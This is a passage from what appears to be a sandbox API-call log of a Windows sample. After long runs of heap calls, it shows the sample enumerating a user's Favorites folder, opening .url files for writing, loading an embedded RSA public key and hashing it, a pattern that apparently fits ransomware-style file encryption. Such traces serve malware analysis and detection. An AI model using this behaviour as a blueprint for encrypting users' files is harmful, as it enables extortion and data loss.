hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0193.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0193.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0193.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0193.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0193.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0193.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0193.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0193.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0193.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0193.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0193.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0193.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0193.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0193.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0193.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0193.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0193.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0193.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.331] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0193.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0193.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3e40 [0193.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.332] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0193.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0193.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3e40 | out: hHeap=0x2c0000) returned 1 [0193.332] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0193.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0193.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0193.333] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0193.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0193.333] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0193.333] PathFindFileNameW (pszPath="") returned="" [0193.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.333] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0193.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.335] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.335] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0193.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0193.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0193.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0193.336] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Autos.url") returned=".url" [0193.336] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.338] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=133) returned 1 [0193.338] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0193.342] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.343] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0193.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0193.344] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.344] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x85, lpOverlapped=0x0) returned 1 [0193.344] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0193.344] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.344] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.344] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0193.345] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0193.345] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.345] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0193.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0193.345] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0193.345] GetLastError () returned 0x0 [0193.345] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0193.345] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0193.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0193.346] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0193.346] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0193.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0193.346] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0193.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0193.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0193.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x3b48b8 [0193.346] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.346] HeapFree (in: 